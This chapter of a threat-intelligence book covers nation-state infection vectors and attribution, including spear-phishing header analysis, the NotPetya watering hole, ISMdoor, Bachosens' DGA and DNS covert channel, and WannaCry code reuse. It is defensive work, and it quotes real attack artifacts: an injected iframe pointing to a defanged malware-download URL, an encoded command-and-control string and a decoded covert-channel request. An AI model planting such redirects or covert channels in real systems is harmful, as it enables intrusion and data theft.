One of the problems plaguing nation-state attackers is all the funding and resources they lose once they’ve been outed. Attacks such as the ones we discussed in Chapter 1 often bring attention to both the victims and the governments behind them, revealing details such as the attacker’s origin, tactics, and malware. Once these are known, security vendors update their products to patch vulnerabilities and create signatures to identify the malware. Now the attacker must develop new malware and hack tools. They’ll also have to obtain new infrastructure if they want to continue operations.
After years of constantly creating new, expensive technologies for their operations, attackers found the answer: simplicity. They realized many of the legitimate tools present in victim environments could perform the tasks necessary to compromise their targets. Developers had already created tools for network-, system-, and security-related functions. Many of these tools have the potential for dual use, meaning that someone could use them for both legitimate and nefarious purposes. Plus, many organizations “whitelist” these tools to prevent security solutions from flagging their use, since admin and security staff use them. And even when security automation detects a suspicious use of a legitimate tool, defenders often ignore it under the assumption that the activity came from one of the sanctioned sources within their environment.
Adversaries began to catch on to this, so they used it to their advantage. These tools helped attackers to compromise victims and gain a foothold within their environments. One good example is Microsoft Sysinternals, a suite of more than 70 tools. Microsoft designed Sysinternals to manage Windows administrative tasks such as executing Windows processes, bypassing login screens, escalating and evaluating policies and account privileges, and performing many other useful tasks for a system administrator. Unfortunately, attackers can take advantage of many of the capabilities Sysinternals provides.
Yet attackers still require an initial infection vector: a means of entering the environment in the first place. This usually involves some sort of social engineering, combined with malware or an exploit. If defensive measures don’t identify this initial infection, the attacker will most likely remain undetected by using legitimate tools to further their compromise. This chapter will cover these infection vectors and how to detect them. We’ll also discuss handling some of the unique and interesting tactics that adversaries have used to infect systems and extract data. These tactics often include deceptive methods that allow attackers to go unnoticed and, in some cases, even elude existing defenses.
Previous chapters of this book have discussed spear-phishing emails, which are the most popular initial infection vector used in nation-state compromises. Unlike regular phishing emails, spear-phishing emails are crafted specifically for the recipient and are thus more difficult to detect. Therefore, defenders must know how to analyze these emails to learn information about the attacker and defend against them more effectively.
The best way to detect phishing is to understand the basic components that make up the Simple Mail Transfer Protocol (SMTP) header found in every email sent and received across the internet. SMTP is the standard protocol used in the transmission of email, and its header is a log of all the points the email traversed while in transit. Basically, SMTP headers provide a map of where the email originated and who it communicated with on its way to the intended recipient. By analyzing an email header, you can determine if the email came from the actual source sender address or if an attacker spoofed it to simply appear as the legitimate email originator. In other words, you can determine if it’s being sent by who you think it is or by someone pretending to be that person.
You’ll likely be able to obtain access to SMTP headers one of two ways. The first way is through your email client, generally as part of the email’s properties that the client should offer an option to view, although each client will vary in this respect. This method works best for analyzing single emails, such as when you receive a suspicious email you want to review. However, analysts will likely want to access this information directly from the source, such as an SMTP server or its associated log server within your environment. This second way allows you to research and correlate header data at a greater capacity. Plus, accessing the information directly from the source rather than manually going to each email through a client interface will be far more efficient.
Here is an example from a spear-phishing campaign linked to a nation-state attacker in 2010. The emails and the associated headers reviewed in this chapter are dated but provide an opportunity to learn from real-world examples.
The following information appeared in the header of one of the emails:
Received: from mtaout-ma05.r1000.mx.aol.com
(mtaout-ma05.r1000.mx.aol.com [REDACTED])
by imr-db01.mx.aol.com (8.14.1/8.14.1) with ESMTP id
oB88rVOV012077 for <@REDACTED>; Wed, 09 Dec 2010 09:53:31
-0500
1 Received: from windows-xp (unknown [121.185.129.12]) by
mtaout-ma05.r1000.mx.aol.com (MUA/Third Party Client Interface)
with ESMTPA id 01C78E000067 for <@REDACTED>; Wed, 08 Dec
2010 03:53:23 -0500 (EST)
Date: Wed, 08 Dec 2010 17:53:24 +0900
2 From: [email protected]
3 To: [email protected]
Subject: The Hanfords' Holiday Party
Message-id: [email protected]
Originating IP
MIME-version: 1.0
X-Mailer: WinNT's Blat ver 1.9.4 http://www.blat.net
Content-type: multipart/mixed;
boundary="Boundary_(ID_4kM3Jn1RnXd4C8N2btJn5g)"
x-aol-global-disposition: G
X-AOL-VSS-INFO: 5400.1158/65845
X-AOL-VSS-CODE: clean
X-AOL-SCOLL-SCORE: 0:2:272206080:93952408
X-AOL-SCOLL-URL_COUNT: 0
X-AOL-IP: REDACTED
The To
field is the name and address information of the email’s intended recipient 3. Sometimes attackers will make this a random address, referred to as a hard target, while the intended victim recipients’ will appear in the email header’s CC or BCC line as soft targets. The hard target will be visible to all recipients, including the recipients in the CC or BCC fields. Simply put, this adds to the legitimacy of the email, particularly if the hard target address belongs to someone the targets actually know, enticing them to open the email. For example, imagine you don’t know the sender but see your boss’s legitimate email address in the To
field. While your boss may not be the target and the email may seem irrelevant to them, you may open it, believing it to be legitimate. Even if the hard target’s email address isn’t a real email address, only the sender will receive the undeliverable mail notification.
If you can see the recipients of the email and there are more than one, you can use that information to identify relationships between the individuals or even find the source of the target list, which you can often find in open source information.
The From
field is the sender of the email 2. It’s important to understand that adversaries can spoof or mask this field to make it appear as though it’s coming from someone the recipient knows. Thus, it is just as critical to identify the authenticity of the From
address as it is the To
address. This is especially significant in situations where the sending address may actually be a user’s legitimate email address, because it allows you to identify whether the account is compromised or merely spoofed. For example, if you receive an email from your supervisor’s legitimate email address and they’re sending you a malicious attachment, there is a good chance someone has compromised their account and is using it in a spear-phishing campaign. Multiple fields will typically include the sender’s email address, such as From
, Sender
, X-Sender
, and Return-Path
. If the address in these fields varies, the email is likely fraudulent.
Here’s a tip: take notice of the alias, which is the sender’s name as displayed to the recipient. You’ll typically find this name to the left of the email address, and it can be anything the creator of the email address specifies. The alias field shows this human-readable name to make it easier for us to see who is sending the email, but often attackers will make it the name of someone the target knows, regardless of the email’s legitimacy.
Another tactic is to place a legitimate sender’s email address in the alias field, since this field displays by default in many email clients. Now the victim sees the legitimate email address even though the email isn’t actually coming from that sender. This is a sneaky way to deceive a target, and often convincing, with a high level of success in spear-phishing attacks.
The originating IP field is the IP address from which the email originated 1. However, there are several IP addresses listed in the email header, because each endpoint at which a mail server processes the email (also known as a hop) will leave its IP address stamped on the header. Always read the header from the bottom up. This will ensure you review each IP address in the order in which it traversed the internet. In this example the IP address is listed in the Received
field.
Unfortunately, IP addresses associated with a public provider’s mail infrastructure, such as Gmail, Yahoo, or Microsoft, won’t help you. These providers mask the originating IP address with their own, creating an additional level of anonymity to protect webmail users. However, when sent from a commercial account, such as a business email address, you’ll see the actual IP address.
From the originating IP address, you can learn several things. First, you can identify a company or organization leasing the IP address. Run a Whois lookup and check the records related to the IP address; sometimes, organizations lease blocks of IP addresses that display the organization name in the record. Second, you can identify domains hosted on the IP address using a reverse DNS lookup. Next, you can run a passive DNS query to identify domains previously hosted on the IP address. We’ll discuss how to run these queries in Chapter 7.
Many SMTP fields begin with X-
. Known as X-Headers
, these fields are created and added during the sending of the email. As they’re generated through the mail-server automation, they’re named in this format to separate them from the fields created by the originating mail client.
The X-mailer
field is used to provide information about the mail client application that created the email. It’s worth tracking this field because, in some cases, adversaries use unique or low-prevalence applications to compose their emails. This is true in both nation-state-based attacks as well as spam campaigns. When this client is unusual enough, or generally not seen in legitimate traffic by the organization you are protecting, you can block it, preventing future malicious emails from getting through to the targeted recipient.
When I tracked this campaign over time, I noticed the attacker always used the Blat X-Mailer and sent the phishing email from an AOL account. While the Blat X-Mailer is a legitimate tool, it stood out because I only ever received malicious emails from it, never legitimate ones. Now I could set up rules to flag any emails that used Blat and originated from AOL. Using this method, I could capture any new email sent by the attacker until they changed their tactics.
The following is another example of a unique X-Mailer
found in a phishing email from a nation-state group named Nitro:1
Received: from (helo=info15.gawab.com)
(envelope-from <[email protected]>) id
; Wed, 11 May 2011
08:48:43 +0200
Received: (qmail 3556 invoked by uid 1004); 11 May 2011 06:48:42 -0000
Received: from unknown (HELO -.net) ([email protected]) by gawab.com with
SMTP; 11 May 2011 06:48:42 -0000
X-Trusted: Whitelisted
Message-ID: <[email protected]>
Date: Wed, 11 May 2011 14:48:38 +0800
From: xxxxxx
To: xxxxxx
Subject: Important notice
X-mailer: hzp4p 10.40.1836
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="_AHrFp2Hwqfwj3DD2dAGF8H9sC"
Return-Path: [email protected]
X-MS-Exchange-Organization-SCL: 0
This unique X-Mailer
has only ever been seen in Nitro spear-phishing campaigns. The identification of this low-prevalence X-Mailer
allowed defenders to track this group’s activities.
The Message-ID
found in the email header is a unique identifier that mail servers use to provide a digital fingerprint for every mail message sent. These Message-ID
s will start and end with brackets, like this: <
[email protected]>
. No two emails should have the same ID; even a response to an email will have its own.
Message-ID
s can help prove an email’s validity. If you find multiple emails with the same Message-ID
, they’re likely forged; quite simply, the mechanics of how messages travel from sender to recipient intrinsically prevent this from happening. Sometimes, though, an adversary manually creates a phishing email by reusing a header from another email. They’ll do this to make it look like the target of the fraudulent email had already forwarded or replied to the email. But in doing so, they also reuse the Message-ID
from another email.
To see how this works, take a look at the following two headers for emails that a nation-state attacker used in an espionage campaign:
Phishing email header #12
Return-Path: <[email protected]>
Received: from msr20.hinet.net (msr20.hinet.net [168.95.4.120])
by mx.google.com with ESMTP id 7si8630244iwn.16.2010.03.22.02.17.22;
Mon, 22 Mar 2010 02:17:24 -0700 (PDT)
Received-SPF: softfail (google.com: domain of transitioning [email protected] does not designate 168.95.4.120 as permitted sender) client-ip=168.95.4.120;
Authentication-Results: mx.google.com; spf=softfail (google.com: domain of transitioning [email protected] does not designate 168.95.4.120 as permitted sender) [email protected]
Received: from REDACTED (www.REDACTED.tw [211.22.16.234])
by msr20.hinet.net (8.9.3/8.9.3) with ESMTP id RAA28477;
Mon, 22 Mar 2010 17:16:22 +0800 (CST)
Date: Mon, 22 Mar 2010 17:16:22 +0800 (CST)
From: [email protected]
1 Message-ID:<[email protected]>
Subject: =?gb2312?B?x+u087zSubLNrLnY16KjoQ==?= <[email protected]>
MIME-Version: 1.0
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5512
Phishing email header #23
Received: from REDACTED.co.kr (HELO REDACTED.co.kr) (211.239.118.134)
by REDACTED
Received: from techdm ([218.234.32.224]:4032)
by mta-101.dothome.co.kr with [XMail 1.22 PassKorea090507 ESMTP Server]
...
Wed, 30 Jun 2010 23:21:06 +0900
2 Message-ID: <[email protected]>
From: xxxxx
To: XXXXXXXXXXXXXXX
Subject: =?big5?B?MjAyMLDqqL6s7KfesqO3frWmsqS9177CrKGwyg==?=
Date: Wed, 30 Jun 2010 22:07:21 +0800
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_000B_01CB18A0.9EBCFA10"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.3138
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5579
Content-Disposition: form-data; name="Invitation"; filename=" Invitation.pdf"
The emails have different dates and subjects yet the same Message-ID
1 2. As it turns out, the attacker used this Message-ID
for all of their spear-phishing emails in the period of about a year, likely because of some sort of automation that created or sent the spear phishes. Another less likely yet still possible reason could be that they simply copied and pasted the same information into every phishing email they created. Regardless, the Message-ID
was great not only for identifying the email as being fraudulent, but also because it helped link these emails with this specific attacker.
It is highly unlikely the recipients of the spear-phishing emails would be able to identify details such as this. However, as a cyber defender, when you track attributes of suspicious phishing emails such as the Message-ID
over time, you can identify these attributes and use them to defend against future attacks.
Yet another field that provides an authentication service for email, the Reply-To
field contains the Message-ID
of the original sending email. The Message-ID
and the Reply-To
identifiers should be unique; if the email’s Message-ID
and Reply-To
ID are the same, then the email is fraudulent. (The example we’ve considered here does not have a Reply-To
field, but some SMTP headers will include it.)
The Date
field represents the date on which a user sent the email, and when included, the Delivery-Date
field represents the date on which the message was actually delivered. These dates may not seem useful at face value, yet when you track phishing campaigns over time, you might be able to use them. Sometimes attackers will send the same phishing email to multiple victims during the same time frame. Remember that, as discussed in Chapter 5, the time zone listed in the Date
field can also provide evidence you can use to attribute the region of the world from which the email was sent. Match the time zone with world regions or countries that use the same time zone. For example, if you saw an email with a “+0730,” it would indicate the email originated from North Korea. Always take note of these details.
The Subject
field can help determine the adversary’s content of interest. For example, if the subjects of multiple phishing emails from the same attacker are all energy themed, you can make an educated assumption that the attacker is likely interested in energy-related targets. This is particularly useful when you don’t know all of the email’s recipients. For instance, an individual from your organization may have received the email in addition to several others from outside of your organization.
Phishing emails usually include either an attachment or a URL that leads to a malicious website. Defenders should track whichever of these is present. The name of the attachment or URL domain can also help indicate the attacker’s target or industry of interest. If there is an attachment associated with the email, you can determine its file type by looking at the Content-Type
or Content-Disposition
field in the header. The name of the attached file will also appear in the name
or filename
field.
Adversaries commonly use freely available blog and text-hosting websites to provide instructions to malware. They may place encoded content into the HTML source code of a website, for instance, or post a comment to the page that the malware can read as part of the compromise.
For example, attackers used a number of free WordPress websites to target people in India beginning in 2013. Figure 6-1 shows one of these sites.
Figure 6-1: WordPress blog site containing malicious encoded content used by the Syndicasec malware
The malware, known as Syndicasec, would connect to the blog and read the encoded string, which provided the address of the command-and-control server to connect to.4 Once the malware decoded this configuration information, it would contact the server, where it could download additional malware or send victim information to the attacker. By designing the malware to obtain the server address from another legitimate website, the attacker could ensure that their operation would continue even if the target identified, blocked, and took down their infrastructure; the attacker could simply change the encoded string on the legitimate web page to point to a new server. This strategy also made detection difficult. Most firewalls won’t block a legitimate website, and the code on the page isn’t itself malicious.
The attacker in this campaign, which originated from China, used this technique many times over several years, posting samples of encrypted code like the following to blogs, or placing them in the source code of compromised pages: @J4AB?h^_:C98C=LMHIBCROm[UqTLv0ZXQSa "!T`a$g`[email protected]
.
Other than using freely available websites, attackers sometimes perform strategic web compromises of legitimate sites, as discussed in earlier chapters. In 2017, ransomware known as NotPetya wreaked havoc on financial institutions globally. At least one of the infection vectors involved the use of a Polish financial supervision website that had been compromised. The attacker realized many banks would access the site, so they placed an iframe in the site’s HTML source code. This iframe redirected victims to another attacker-created website, which downloaded the NotPetya malware:
"iframe name='forma' src='https://sap.misapor[.]ch/vishop/view.jsp?pagenum=1'
As you can see, the iframe directs the visitor to sap.misapor[.]ch
, where a Microsoft Silverlight application infects the victim.5 Within the first day of this attack, more than 20 financial institutions in Poland became infected.
When investigating an attack, it’s important to distinguish legitimate but compromised infrastructure from attacker-created infrastructure, because in each case you’ll likely handle the indicator (whether that be the domain, URL, or IP address) differently. In situations like the NotPetya case, where legitimate websites were compromised, you may not want to create a rule that permanently blocks activity from the legitimate website, since the site’s owner will probably mitigate and remove the malicious content eventually. If, however, an adversary created the domain specifically to use in attacks, you would likely want to permanently block it.
Luckily, determining if a domain is compromised or attacker-created is usually an easy task once you know what to look for. Checking domain registration, search engine results, and website archives can all help you make an accurate assessment. Domain registration records often provide clues if the attacker registered the domain themselves. While it’s unlikely that they would publicly display legitimate registration information, you can compare the date of the domain’s creation to its last update and determine if the update matches the malicious activity’s timeframe. If it was updated or created at or near the time of the attacks, it’s possible the attacker created the domain. For example, the following is the registration for a domain used in attacks beginning in December 2019.6 The registration dates show that someone created the domain a few weeks prior to its use in attacks. Since the dates of activity and registration align, it suggests an attacker created the domain.
Domain Name: MASSEFFECT.SPACE
Registry Domain ID: D147467801-CNIC
Registrar WHOIS Server: whois.reg.ru
Registrar URL: https://www.reg.ru
Updated Date: 2019-11-30T07:02:34.0Z
Creation Date: 2019-11-25T06:29:30.0Z
Registry Expiry Date: 2020-11-25T23:59:59.0Z
Registrar: Registrar of Domain Names REG.RU, LLC
Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Privacy Protection
Registrant State/Province:
Registrant Country: RU
Registrant Phone: +7.4955801111
Registrant Email: [email protected]
Admin Phone: +7.4955801111
Admin Email: [email protected]
Tech Phone: +7.4955801111
Tech Email: [email protected]
Name Server: NS1.REG.RU
Name Server: NS2.REG.RU
DNSSEC: unsigned
Billing Phone: +7.4955801111
Billing Email: [email protected]
Registrar Abuse Contact Email: [email protected]
Registrar Abuse Contact Phone: +7.4955801111
The domain’s IP address resolution can also help with this assessment. While not a hard rule, legitimate websites are often hosted either on a web server with many other domains or on corporate infrastructure whose domains are all associated with the same company. Attackers may not want to share IP space with other infrastructure, and because of that, they will often lease infrastructure to host only their own domains. When you encounter this scenario, you should conduct additional research to determine if the other domains are also linked with the attacker’s operations.
In other instances, attackers might register websites and park them on a hosting provider’s server until they are ready for an attack. When a domain is parked, it resolves to a nonroutable IP address where the domain sits. Essentially, the domain is offline; it isn’t accessible to resolve or host live content. For someone to use the domain, it would need to relocate to a live, or routable, IP address. If the timeframe of that resolution change matches the time of the malicious activity, this can indicate the attacker’s control over the domain.
Finally, domain archive websites such as https://archive.org/ capture the historical state of websites, and you can query them to determine and validate the website’s previous usage. Looking at the archived state of a domain of interest should quickly reveal its legitimacy. For example, in Figure 6-2, you can see that different users have archived AOL’s website 354,600 times since December 20, 1996. If you had never heard of the site and first came across the domain while investigating malicious activity, seeing this many captures would suggest that the domain was indeed legitimate, as opposed to malicious and fraudulent.
You should still be cautious when researching domains that you suspect of hosting malicious activity, however. If you view a website’s archive for one of the dates on which it hosted malware, you could very well infect yourself. This is especially true if the compromised domain used JavaScript or an iframe to redirect visitors to other malicious infrastructure.
Figure 6-2: Historical website record from https://archive.org/ as seen in 19977
Advanced adversaries often develop their own malware to use in targeted attacks. In doing so, they’ll often hide in plain sight, which is a difficult tactic to defend against. By blending in with legitimate traffic and using commonly accessed public infrastructure, the attackers often go unnoticed. This means that defenders must look at both malicious and legitimate activity to understand the attack taking place. Let’s consider some real-world examples.
In Chapter 1, we discussed Iran’s cyberwarfare program and its history. One of the attacks, known as Shamoon, relied on destructive malware that wiped infrastructure and systems associated with oil companies in the Middle East beginning in 2012. A second wave of Shamoon attacks, in 2016, used a new version of their custom wiper malware. The attacks began after a suspicious binary appeared on a company’s infrastructure in the Middle East. The initial investigation identified a malicious payload with strong similarities to the original Shamoon malware. However, nobody had ever previously seen this variant in the wild.
Analysis of the malware showed that the new payload could steal information from the victim’s system and provide the adversary with remote access, as well as the ability to install additional malware. Upon execution, the malware collected information from the victim system, such as usernames, the IP address, mapped drives, current network connections, and running processes or services.8 After gathering the information, the malware would transmit this data back to the attacker’s remote infrastructure. Analysts eventually detected the malware, naming it Trojan.ISMdoor based on this PDB string found in the binary: ProjectsBotBotsBot5ReleaseIsm.pdb.9
ISMdoor may have come to light earlier if the attacker had not hidden in plain sight in such a novel way: the attacker concealed the binary within a legitimate component of NTFS, the file system for the current Windows operating systems, referred to as an Alternate Data Stream (ADS). ADS was a feature designed to provide files with everything the application needed to open and run them, as described by the tech blogger hasherazade.10 Over time, as operating systems and applications evolved in both size and complexity, the usefulness of ADS changed. It just wasn’t feasible for an application to encompass the amount of data required to use ADS, as originally intended. In addition, it takes very little skill to make an ADS, and to make things worse, nobody checks the ADS content for validity, nor is there a strict format the ADS data needs to be in.11 Furthermore, the ADS doesn’t affect the size of the associated file, so you wouldn’t even necessarily notice a change in file size if the ADS content suddenly included malicious content.
The attacker behind ISMdoor used ADS to covertly store and exchange information unbeknownst to the end user. They hid the payload in an ADS within a RAR archive and then delivered this archive in a phishing email that targeted key personnel at specific organizations. This allowed them to infect targets with custom-developed malware that was part of a larger espionage and sabotage campaign. While nobody has confirmed attribution at the time of writing, current data suggests that an Iran-based cyber-espionage group known as Greenbug developed this malware for a nation-state sponsor.12
This attack eventually enabled the adversary to steal even more credentials. These credentials were likely used in a second phase of Shamoon’s attack, which the attackers designed to wipe and destroy the systems and servers hosting the malware. By hiding and taking advantage of the legitimate ADS component of the operating system’s NTFS file structure, Greenbug was able to covertly hide malware and infect their predetermined victims.
Attackers are constantly coming up with creative ways like this to get around defenders and breach target environments. In addition to using exploits and elaborate hack tools, sophisticated attackers will also take advantage of flaws present in legitimate software. Malicious code hidden within legitimate applications and protocols can bypass firewalls, intrusion detection systems, endpoint detection, and other automated defenses.
Adversaries sometimes manipulate legitimate internet protocols to communicate with their malware while going unnoticed. In May 2017, an attacker used previously unknown malware to steal sensitive intellectual property. The malware, now known as Bachosens, is a great example of how attackers will abuse and exploit legitimate protocols; the subsequent investigation revealed the use of an interesting and deceptive technique.13
Most malware needs to communicate with command-and-control infrastructure somehow. If not, the attacker will need direct remote access to the victim environment. In the Bachosens case, however, the malware produced very little observable network traffic. This was because the malware sent information over covert channels, leaving the victim networks and defenders blind to what was taking place. The attackers had built two components into the Bachosens malware with the intent of deceiving defenders.14
The first component involves how the malware decides where to send and receive information. Typically, attackers will either register their own infrastructure or compromise legitimate websites that communicate with the malware. In turn, the malware will often use a configuration file to determine where to send and receive commands, or else it will have the command-and-control infrastructure’s address hardcoded in the binary.
In this example, however, the attacker developed malware that relied on a domain generation algorithm (DGA) to determine the C&C server. A DGA is a deceptive technique that creates new domains by using an algorithm to generate fresh domain names. DGAs have several benefits, the first of which is how a DGA creates the server: randomly. The DGA generates domain names made from a predefined number of random characters. As the malware creates these domain names, it can dynamically register them on the fly to ensure they’re using fresh infrastructure in each attack. And although Bachosens didn’t take advantage of this feature, DGAs can also generate a high volume of domains during the infection, making it difficult for defenders to identify the real command-and-control infrastructure; imagine that the attacker generated 1,000 domains and registered only one of them. Hunting for the real domain forces the defender to spend time and resources.
The Bachosens malware author used the DGA algorithm to create a random domain upon execution in the victim’s environment. Interestingly, though, the Bachosens variants found in the wild generated only 13 domains per year.15 From the 13 domains, only two were active at any given time, and of those two, only one domain changed each month. The other domain remained static for the entire year. (This is important to note, because an advanced attacker would likely maximize the benefits of using a DGA with custom-developed malware. While the malware itself was rather sophisticated, the operator behind it wasn’t so elegant, and the decision to not take full advantage of the DGA component eventually led to the attacker’s identification. By reversing the algorithm, defenders only had to research 13 domains, not hundreds or thousands.)
In addition to using a DGA to create command-and-control servers, Bachosens communicated covertly over the DNS, ICMP, and HTTP protocols. It initiated the communication to the server through the use of AAAA DNS records, which map a hostname to a 128-bit IPv6 address. IPv6, or version 6 of the Internet Protocol, is designed for communicating and routing traffic across networks. To connect to a website that uses IPv6, clients will query these AAAA records to find the address associated with the domain name.
But the attackers used these DNS records to transmit encrypted information within the IPv6 addresses they contained, which isn’t the protocol’s intended function. Unfortunately, the protocol lacks data validity checks in some of its fields, allowing the attacker to replace the intended data with their own. As specified, an AAAA record maps an IPv6 packet comprising eight hextets, each of which has a specific purpose (Figure 6-3).
Figure 6-3: The IPv6 protocol packet structure
As you can see, the source address portion of the packet is composed of three fields: the routing prefix, the subnet ID, and the interface ID. The subnet ID field was designed to grant network administrators the ability to define subnetworks within their network address space, but the Bachosens attacker took advantage of this feature by placing encrypted data into this portion of the packet. The following is an example of the AAAA DNS request that the Bachosens malware generated:
2016-08-08 17:26 2016-08-08 17:26 v5i7lbu5n08md2oaghfm2v1ft2z.ostin.su (rrset) AAAA d13:8355:57fe:3f93:7c8a:d406:e947:7c04, a96a:61c:1798:56ee:5a13:4954:1146:f105 2
decrypted message = {87|3d55|c128738c |f40101|0201|0|00000003}
1 2 3 4 5 6 7
The encrypted data that the malware inserted into the request contains commands that, once decrypted, allow the attacker to identify specific victims via a session ID. This data breaks down into the following components to reveal information taken from the victim:
1 nonce = 87
2 checksum = 3d55
3 session_id = c128738c
infection_year = 2016
infection_month = 8
infection_day = 8
infection_random = 738c
4 sid_relative_identifier = f40101
5 request_kind = 0201
6 padding_size = 0
7 request_sequence = 00000003
The attacker uses session ID c128738c
to encrypt data in future communications between the infected victim and their command-and-control infrastructure. Next, the Bachosens malware transmits victim information back over the same covert channel, this time including information such as the operating system, username, and associated permissions. The attacker used these IDs to track details about the infections, like the time of the infection’s initiation and the last time communication with the victim took place.
Symantec was the first to identify this attack. In public reports, it documented the process of tracing the activity to its command-and-control infrastructure to identify the individual behind the attacks.16
Symantec used domain registration and DNS records associated with the attacks to map out two years’ worth of infrastructure. Patterns present in both the malware and infrastructure matched the naming and DGA format seen in Bachosens malware, and it also used 13 domains each year to support the attacker’s operations. However, analysis of an older variant of the malware revealed a slight variation in tactics for creating the 13 domains. In the older variant, only 12 of the 13 domains used the DGA to create and dynamically register infrastructure. The malware still used a total of 13 C&C servers, but the attacker created and registered one domain through traditional means: by purchasing and registering the domain through a registrar. The domain hadn’t seen use for some time, but oddly enough the registrant didn’t attempt to mask their identity or even use a domain privacy protection service.
In addition to this registration tie that Symantec identified, a number of AAAA records associated with other IPv6 addresses appeared in older Bachosens malware samples. Specifically, these were older samples that others submitted to public malware repositories. Researching these public samples revealed several other historical domains that were also hosted on infrastructure that an attacker had previously used. Similar to the report, the domains shared registration details that linked to the same individual previously attributed to the attacks. As mentioned earlier, passive DNS and domain registration records can often reveal patterns in an adversary’s infrastructure.
By overcoming both the DGA and the covert communication method that the malware used, solid analytical methods and tools allowed researchers to build out and associate a timeline of attacker infrastructure. Eventually, this led to the adversary’s OSINT missteps discussed earlier. More importantly, however, this example demonstrates how attackers create advanced malware to hide in plain sight by utilizing legitimate protocols. This allowed them to pass through defenses without proper inspection and compromise an unknowing victim, leading to the theft of their vital intellectual property. While the attribution details are outside the scope of this chapter, you can find further details about the Bachosens malware in the article “Operation Bachosens: A Detailed Look into a Long-Running Cyber Crime Campaign” on Medium.com.
One thing that malware, scripts, and software applications all have in common is that humans create them. And humans often reuse code; after all, it’s our nature to want to work smarter, not harder. If a developer already has a piece of code to provide a certain functionality, they’ll often simply reuse it rather than spend the time creating something new. Attackers don’t want to write new code from scratch just for the sake of having it be original. But this code reuse may have implications for attribution once the malware appears in real-world attacks. We’ve discussed how attackers may try to remain undetected by using open source software. Yet while open source code may be easy to use and makes attribution difficult, it doesn’t make for particularly advanced or sophisticated malware. Given its drawbacks, nation-states will often develop their own tools, which takes a lot of resources and funding.
The good news is that some of the most complex and large-scale attacks against formidable organizations are now public knowledge. Unfortunately, this doesn’t mean the attacks failed, nor does it mean that attackers have faced any repercussions. What it does mean is that future attacks may become easier to attribute, due to attackers’ tendencies to reuse code. Patterns in malware alone are generally not enough evidence for an attribution claim, which should come from multiple sources. However, there are exceptions: when you’re dealing with advanced but exceedingly rare or unknown malware, your confidence level can be higher. Given these risks, it may seem crazy for a high-stakes espionage operation to reuse code present in highly public attacks. Yet this scenario has occurred many times, including in 2017, in a global cyberattack. The following story is a great example of how and why attackers reuse code, as well as how defenders can use recycled code against the attacker for attribution purposes.
On Friday, May 12, 2017, reports of a massive ransomware outbreak rapidly surfaced. A new variant of ransomware was infecting users, and quickly, due to its design components; the attackers had built a ransomware module into a self-propagating worm. The malware was able to not only infect but also spread from one victim to the next, crippling entire organizations. A ransomware attack on this scale had only rarely happened, if indeed ever at all. Within hours of the first signs of activity, media organizations began calling the malware WannaCry.
Mitigating the threat was the top priority for defenders and security vendors at the time. The second priority was identifying evidence to determine who was behind the attack. Thankfully, a major breach, disclosed only a month prior, provided clues. In April 2017, a hacker group calling itself the Shadow Brokers publicly released a trove of files, which they claimed to have stolen from the U.S. government. (To date, the truth of this claim remains nebulous.)
The dataset included malware that exploited a vulnerability in the Microsoft Windows Server Management Protocol (SMB), which is designed to provide shared access to files, printers, and other devices within the Windows environment.17 This made for an effective mechanism to distribute malware, since the SMB protocol already communicated with many devices within networks. Moreover, use of the exploit would not help defenders with attributing the attack, given that anyone could download and access the malware. The protocol exploit proved the perfect vector for spreading the WannaCry malware.
Regardless of an outbreak’s size, one of the first things defenders and researchers always do is determine where and how the outbreak began. Finding the first known infected host, known as patient zero, can provide valuable information, such as how the infection started. Upon identifying the initial victim, you can then often find other tools or malware, which may provide additional clues about the attacker. In the case of WannaCry, defenders found evidence showing that the first infections began with a few computers three months prior, in February 2017. (Interestingly, the ransomware did not spread at a consistent rate: it spread much faster in May than in February. One theory is that the February instance was simply a test run. After all, it is best practice to test your tools before deploying them. It’s plausible that the attacker was trying to check if defenders would detect the attack.) From there, the attack proceeded to grow from just a few computers to a global ransomware epidemic.18
One of the first clues as to who was behind the WannaCry infections came from a now-public investigation that claimed the earliest infected systems also contained another variant of malware, called Backdoor.Destover. More importantly, this was the malware used in the 2014 attacks against Sony Entertainment, attributed to North Korea. It is highly improbable that both espionage-grade malware and unique ransomware would have coincidentally infected the same three computers in February 2017. Still, defenders required more evidence if they were to prove North Korea was behind the WannaCry attack.
The next clue came on Monday May 15, by which point the WannaCry ransomware had made millions of infection attempts. Neel Mehta, a Google security researcher, tweeted about a very distinctive cipher associated with the WannaCry malware (Figure 6-4).
Figure 6-4: Tweet from Neel Mehta documenting his discovery of the cipher
Security vendors who were already conducting research on the WannaCry malware began to look more closely at the cipher. They compared it with samples from their malware repositories, searching for previous instances where the cipher had appeared. This was how they discovered WannaCry shared the cipher with malware known as Cruprox and Contopee, custom nation-state malware variants previously attributed to North Korea. This, along with the Destover malware found on the same victims as in the February 2017 WannaCry infection, provided significant evidence.
WannaCry is a great example of adversaries reusing code across multiple malware families. If the attacker had simply created their own cipher to support the malware, defenders wouldn’t have been able to provide evidence to support the attribution theory. Today, the North Korea attribution is widely accepted based on the cipher and other supporting evidence. This is a good exercise to conduct when you find new targeted malware but don’t know the attacker. You have to be cognizant of false flags and have multiple pieces of evidence to support attribution, but shared code between malware families is often a strong supporting factor.
Similar to how code reuse can help with identifying malware developed by the same authors, the reuse of specific vulnerabilities can sometimes aid in attributing an attack. The malware itself needs a vulnerability to exploit in order to deliver its payload. Nation-state attackers often perform extensive reconnaissance, profiling the systems and applications their target uses to identify unpatched software that they can then compromise.
As a general truth, software evolves until it reaches an end-of-life state. During the lifecycle of any given program, vendors will fix flaws in the software by releasing patches to the code alongside additional updates. The most severe of these software flaws occur when they let an attacker either bypass or acquire access to the victim’s security controls. These are the flaws we refer to as security vulnerabilities. Of course, since security vulnerabilities have a much higher level of urgency than regular software updates, patching these security vulnerabilities holds a high priority for vendors. Thus, just like software, vulnerabilities have a lifespan, from when defenders discover the vulnerability to when they patch and remediate it. As we’ve discussed elsewhere in this book, the term zero-day exploit refers to a security vulnerability that has no current patch or remedy. These are the worst types of vulnerabilities or exploits that exist, because, quite simply, there is no way to defend against them in the moment. Even worse is when attackers exploit these unpatched vulnerabilities remotely. In these cases, all the attacker needs is an internet connection.
